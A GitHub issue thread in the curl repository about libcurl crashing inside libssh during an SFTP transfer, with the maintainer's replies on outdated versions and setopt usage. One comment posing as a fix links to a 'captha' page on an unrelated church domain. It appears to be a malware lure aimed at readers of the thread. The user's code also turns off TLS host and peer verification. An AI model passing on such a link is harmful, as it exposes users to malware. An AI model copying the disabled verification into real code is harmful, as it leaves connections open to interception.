### ISSUE TITLE
libcurl is crashing due to ssh poll timeout, setting LIBCURL_TIMEOUT is not working as expected.

### ISSUE THREAD

**Issue by bagder** [curl/curl#15426]
### Discussed in https://github.com/curl/curl/discussions/15425

<div type='discussions-op-text'>

<sup>Originally posted by **anuanton** October 28, 2024</sup>
I am using libcurl to do a network transfer. The Curl connection timeout was provided as 300 seconds. The application process has a healthcheck time of 360 seconds. The curl_easy_perfrom was stuck at some point, and the crash was happening at around 11 minutes. The initial piece of code was 

curl_easy_setopt(m_curl_handle,CURLOPT_URL, m_remote_url.c_str());
curl_easy_setopt(m_curl_handle, CURLOPT_POSTQUOTE, headerlist);
curl_easy_setopt(m_curl_handle, CURLOPT_SSL_VERIFYHOST, 0L);
curl_easy_setopt(m_curl_handle, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(m_curl_handle, CURLOPT_READDATA, hd_src);
curl_easy_setopt(m_curl_handle, CURLOPT_INFILESIZE_LARGE, (curl_off_t)fsize);
curl_easy_setopt(m_curl_handle, CURLOPT_CONNECTTIMEOUT,300);
CURLcode result = curl_easy_perform(m_curl_handle);

This program was crashing with the below core dump:
Thread 1 (Thread 0x7fba2cac90c0 (LWP 1981780)):
#0  0x00007fba26fd4ac1 in poll () from /lib64/libc.so.6
#1  0x00007fba27e6f7b8 in ssh_poll_ctx_dopoll () from /lib64/libssh.so.4
#2  0x00007fba27e70890 in ssh_handle_packets () from /lib64/libssh.so.4
#3  0x00007fba27e7095d in ssh_handle_packets_termination () from /lib64/libssh.so.4
#4  0x00007fba27e53d04 in ssh_channel_read_timeout () from /lib64/libssh.so.4
#5  0x00007fba27e7e384 in sftp_packet_read () from /lib64/libssh.so.4
#6  0x00007fba27e7e7b0 in sftp_read_and_dispatch () from /lib64/libssh.so.4
#7  0x00007fba27e82538 in sftp_open () from /lib64/libssh.so.4
#8  0x00007fba280ed2d0 in myssh_statemach_act () from /lib64/libcurl.so.4
#9  0x00007fba280eed0a in myssh_multi_statemach () from /lib64/libcurl.so.4
#10 0x00007fba280e3ab0 in multi_runsingle () from /lib64/libcurl.so.4
#11 0x00007fba280e4b41 in curl_multi_perform () from /lib64/libcurl.so.4
#12 0x00007fba280db42b in curl_easy_perform () from /lib64/libcurl.so.4

From few internet sources, the below settings were added:
curl_easy_setopt(m_curl_handle, CURLOPT_TIMEOUT,302);
curl_easy_setopt(m_curl_handle, CURLOPT_NOSIGNAL,1L);

Still the crash is happening as before. 
Can someone help to understand the reason for crash, and why the timeout functionality is not working?</div>

**Comment by bagder** [comment]
1. Which libcurl version?
2. Which libssh version?
3. Please provide a small example code that reproduces the problem

**Comment by anuanton** [comment]
Curl version:

curl 7.61.1 (x86_64-redhat-linux-gnu) libcurl/7.61.1 OpenSSL/1.1.1k zlib/1.2.11 brotli/1.0.6 libidn2/2.2.0 libpsl/0.20.2 (+libidn2/2.2.0) libssh/0.9.6/openssl/zlib nghttp2/1.63.0
Release-Date: 2018-09-05
Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtsp scp sftp smb smbs smtp smtps telnet tftp
Features: AsynchDNS IDN IPv6 Largefile GSS-API Kerberos SPNEGO NTLM NTLM_WB SSL libz brotli TLS-SRP HTTP2 UnixSockets HTTPS-proxy PSL



SSH version:
OpenSSH_8.0p1, OpenSSL 1.1.1k  FIPS 25 Mar 2021


The issue is sporadic in nature. Issue is happening when there is a connectivity issue to the remote server. 

curl code:
curl_easy_setopt(m_curl_handle,CURLOPT_URL, m_remote_url.c_str());
curl_easy_setopt(m_curl_handle, CURLOPT_POSTQUOTE, headerlist);
curl_easy_setopt(m_curl_handle, CURLOPT_SSL_VERIFYHOST, 0L);
curl_easy_setopt(m_curl_handle, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(m_curl_handle, CURLOPT_READDATA, hd_src);
curl_easy_setopt(m_curl_handle, CURLOPT_INFILESIZE_LARGE, (curl_off_t)fsize);
curl_easy_setopt(m_curl_handle, CURLOPT_CONNECTTIMEOUT,300);
curl_easy_setopt(m_curl_handle, CURLOPT_TIMEOUT,302);
curl_easy_setopt(m_curl_handle, CURLOPT_NOSIGNAL,1L);
CURLcode result = curl_easy_perform(m_curl_handle);

**Comment by bagder** [comment]
That's an awfully old libcurl: over six years old. The libssh version is three years old.

I realize you probably run the latest your distro offers you, but that's still a stale old version for which we have done thousands of bugfixes since. We can't really help you with that version. I would encourage you to try a modern version to at least see if the problem isn't already fix there.

The stack trace you show implies that this crash is happening inside libssh, which *might* imply that you can fix this problem by only upgrading libssh and not libcurl. I don't think this crash happens because of a bug in libcurl.

**Comment by bagder** [comment]
> From few internet sources, the below settings were added:

Really?

> curl_easy_setopt(m_curl_handle, CURLOPT_TIMEOUT,302);

You should make sure the argument is a long, not an int. So `302L` (which goes for all numerical setopt options you set). But also: that seems weirdly specific. And quite long. And should probably rather use a define or a comment explaining the reasoning behind it.

> curl_easy_setopt(m_curl_handle, CURLOPT_NOSIGNAL,1L);

This is rarely the correct choice, so I hope you have read the documentation for this option and know this is right for you.

**Comment by AchilleasTsiamoulis** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by bagder** [comment]
Presumed working in modern versions.
